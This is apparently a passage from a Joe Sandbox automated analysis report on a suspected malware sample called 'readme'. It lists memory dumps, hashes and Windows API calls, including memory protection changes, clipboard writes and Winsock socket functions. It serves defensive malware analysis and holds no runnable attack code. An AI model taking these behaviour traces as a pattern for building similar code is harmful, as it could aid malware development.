                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CompatibleCreateDirectorySystem
                                                                                                                                                                                                          • String ID: Macromed\Flash\
                                                                                                                                                                                                          • API String ID: 2606042488-1438515271
                                                                                                                                                                                                          • Opcode ID: d451729974a22e2174cc262673041bd25aa8ed66c57df716bc48c0d66078c0ab
                                                                                                                                                                                                          • Instruction ID: 299e9cb63676f09c6c690dce7675c16131e739682a5e940449f79e26451de6f9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d451729974a22e2174cc262673041bd25aa8ed66c57df716bc48c0d66078c0ab
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F118A711047016FC704EF21EC52AAF77E4BF98704F40491EF19943281DB78A908CFAA
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5B22,00000001,000000FF), ref: 004F2BFE
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F2C88
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F2CCE
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F2CF1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2978645861-0
                                                                                                                                                                                                          • Opcode ID: 72ef37a4ce696f50df890290b9b7b99c0f9e4ea6355bbf9b4210c3caf82ba29b
                                                                                                                                                                                                          • Instruction ID: d821757bbb06b5f881817bb4be3b83133dcd2ebdcf47b2e92145d0cebd45ebc1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72ef37a4ce696f50df890290b9b7b99c0f9e4ea6355bbf9b4210c3caf82ba29b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D631D2762042854FD3248F29D898A3BBBF5EFD9351F19856EE696C7381C779D808C720
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00000000,?,004F7247,?), ref: 004F64C1
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F64E6
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F64EC
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F6515
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                          • Opcode ID: f847da26358d00d5442f5224005a34bf56e55c89d248726b642e497024ea2ade
                                                                                                                                                                                                          • Instruction ID: c39e4b2d7a975ea5970b06f88a1f0ae82272a8bb6f48ad921d14b69448efe04b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f847da26358d00d5442f5224005a34bf56e55c89d248726b642e497024ea2ade
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC0188352003485BC714EF24D880A77F3A9AF46258B19559DE5C657342CA39EC06CBA4
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0040139D
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004013B3
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000005), ref: 004013CA
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000005), ref: 004013D8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                          • Opcode ID: be455565a85d393211932c010ec7194a6f72a0f8e03aef377b487af276531eef
                                                                                                                                                                                                          • Instruction ID: 1dc668918495c93d19b35d2f921703afc781594381be1afc9f76799b5a6aac2f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: be455565a85d393211932c010ec7194a6f72a0f8e03aef377b487af276531eef
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 280112B620070AAFC310CF69D884946FBF8FFA8314B10C55AE95983711C771F956CBA0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 007A90C1
                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,?), ref: 007A926D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000003.1625143937.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_3_770000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2087232378-0
                                                                                                                                                                                                          • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                          • Instruction ID: 3da77de92bf0c33bc52e49a700e110508d5e24bdc964440293630acdd4b79e25
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E719C71D0424ADFCB41CF98C881BEEBBF0BB4A314F244195E665F7281D238AA91DF65
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 007A9314
                                                                                                                                                                                                            • Part of subcall function 007A9098: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 007A90C1
                                                                                                                                                                                                            • Part of subcall function 007A9098: VirtualFree.KERNELBASE(00000000,00000000,?), ref: 007A926D
                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 007A9366
                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(0000002C,?,00000040,0000002C), ref: 007A93C0
                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,?), ref: 007A93F3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000003.1625143937.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_3_770000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Virtual$Alloc$Free$Protect
                                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                                          • API String ID: 1004437363-3772416878
                                                                                                                                                                                                          • Opcode ID: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                                                                                                                                                                                          • Instruction ID: fdc3e14bfe8bd98f10242a0524754a491cccef1a7c378bc05cf1da2b973c4246
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E51F975900709EFCB10DFA9C885A9EBBF4FF49344F10851AFA59A7240D374E951CBA4
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000003.1625143937.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_3_770000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __freea$__alloca_probe_16
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3509577899-0
                                                                                                                                                                                                          • Opcode ID: ce9059a0f54269a3e857cd05decacb9db5d80458a844bd6716999fbfe2567560
                                                                                                                                                                                                          • Instruction ID: fd6922cf7a80161dd0570e670522332710b0b795b89aff0777e773291c4cc3ee
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce9059a0f54269a3e857cd05decacb9db5d80458a844bd6716999fbfe2567560
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34519373700606AFEB215FA4CC89EBB7BA9DFC6710B150B29FD0496151E738ED5086A1
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,007A12D6,00000001,00000364,00000000,?,000000FF,?,007A44E3,?,?,00000000), ref: 007A1789
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000003.1625143937.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_3_770000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                          • Opcode ID: 0596b3e3bb4ee076d882318f24e778a83a401db1bf84a202353ae450301ec008
                                                                                                                                                                                                          • Instruction ID: 154d7c5781bc45dc2e1e534129e35c8708544993023084300fd8ef5a2906b620
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0596b3e3bb4ee076d882318f24e778a83a401db1bf84a202353ae450301ec008
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77F0E931600234AAFB612A329C49B7B37489FC37B0F549312FC189A090EA2CDC0046E4
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LCMapStringEx.KERNELBASE(?,007A0C92,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 007A3D75
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000003.1625143937.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_3_770000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: String
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2568140703-0
                                                                                                                                                                                                          • Opcode ID: d727af7c0b24174baf6674acea18e18495a24099b1991f5a4d4d2d4c43d856f5
                                                                                                                                                                                                          • Instruction ID: f5da0ac4411f4585a45001adfe7889a157d9ede36c0b1885ca72ad1c5d438d21
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d727af7c0b24174baf6674acea18e18495a24099b1991f5a4d4d2d4c43d856f5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2F07A3650021EFBCF126F90DC09DDE3F26EF89360F058211FA1825020C73AC931AB90
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,00000000,?), ref: 0079BFCE
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000003.1625143937.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_3_770000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                          • Opcode ID: 690d0b966addc1296c1a84957827a07f248c1aeee82d1611503b10e66bc6485d
                                                                                                                                                                                                          • Instruction ID: 1fc4dd6c3aeaaee0817216e36ba63e5b521813be904bdd1d1e2e3dac9636e59c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 690d0b966addc1296c1a84957827a07f248c1aeee82d1611503b10e66bc6485d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA312871900209AFCB10DFA9ED80BAEBBF5FF48710F10802AE559AB250D779A905CF94
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 0079BCC7
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000003.1625143937.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_3_770000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                          • Opcode ID: 2b98aa5a84afd173d90c2bfe6f1fcf2b928bb24c025f6a62b163b41e7890a4c3
                                                                                                                                                                                                          • Instruction ID: f5ba4a2137a67daeb2fbb8b41962ef0f6117c7a666148d136e8c43de06cc210a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b98aa5a84afd173d90c2bfe6f1fcf2b928bb24c025f6a62b163b41e7890a4c3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7E06DB5901622BB97112B20BE09E7B766CEF927413048525FA24E2240DF38DC11C6B5
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002002,00000002), ref: 004D9B06
                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004D9B17
                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004D9B28
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,00000000,00000000), ref: 004D9B51
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002002,00000001), ref: 004D9B61
                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004D9B70
                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004D9B81
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002002,00000003,?,?,?,00000000,0040D599,00000000,00000000), ref: 004D9BB8
                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004D9BC5
                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004D9BDB
                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 004D9BEB
                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 004D9BF5
                                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004D9C08
                                                                                                                                                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 004D9C11
                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 004D9C13
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$Clipboard$AllocLockUnlock$Data$ByteCharCloseEmptyMultiOpenWide
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3392129136-0
                                                                                                                                                                                                          • Opcode ID: 6ce6bc6ff71d1a8c4d07697407ae3b5d450af23bfff1a9a29fd96cc425f21c01
                                                                                                                                                                                                          • Instruction ID: e40826f6a6b6de4095afa5ba746f594757548e465f4129e7c784a6b23cc7d310
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ce6bc6ff71d1a8c4d07697407ae3b5d450af23bfff1a9a29fd96cc425f21c01
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A41F371104302ABE3111B61BC99B277BFCAFA1B04F09041BF986D7341DA69EC09D7BA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000003.1625143937.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_3_770000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: ab678024b27634cae8f009ada00d78c64daba5d8a61eb3502b89817b54d872ca
                                                                                                                                                                                                          • Instruction ID: 20744ecfedf4c28fd76f74ea8c3d8a786a43a3a68d56d5ce4262764e8bcaaa8c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab678024b27634cae8f009ada00d78c64daba5d8a61eb3502b89817b54d872ca
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2516CB1A122099FEF16CF59E9D17AEBBF1FB48310F14806AD405EB250D3789940CF51
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000003.1625143937.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_3_770000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                                                                          • Instruction ID: 3a0743dcc37270f94bbdfc13b256ffb0086501d309c9e3f5df53f5aed5376cb7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66F06D79A00200EF8B24DF0AC548E95B7F6FBC6720B6546A5E504DB2A1D3B8ED54CBA0
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: WSAAsyncGetHostByName$WSAAsyncSelect$WSACancelAsyncRequest$WSACleanup$WSAGetLastError$WSAStartup$WSOCK32.DLL$accept$bind$closesocket$connect$htonl$htons$inet_addr$listen$recv$recvfrom$send$sendto$socket
                                                                                                                                                                                                          • API String ID: 0-3677570488
                                                                                                                                                                                                          • Opcode ID: 92a4acbc399bf9b3ce295a5f3de41989e4871b31030ec6fc55de6d5f39285aff
                                                                                                                                                                                                          • Instruction ID: 8c9ac86f1f98df4bb1f2f2f05f7a43d8bd4a8589446ea9a4d4fdb8b68f6288ad
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92a4acbc399bf9b3ce295a5f3de41989e4871b31030ec6fc55de6d5f39285aff
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5031DE71D523646AD7206BB9EC19DEF3EACFBB6704B510517F000972A0EAF88458AF94
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 004F4A89
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4AFB
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4BF2
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000), ref: 004F4CEA
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 004F4CFD
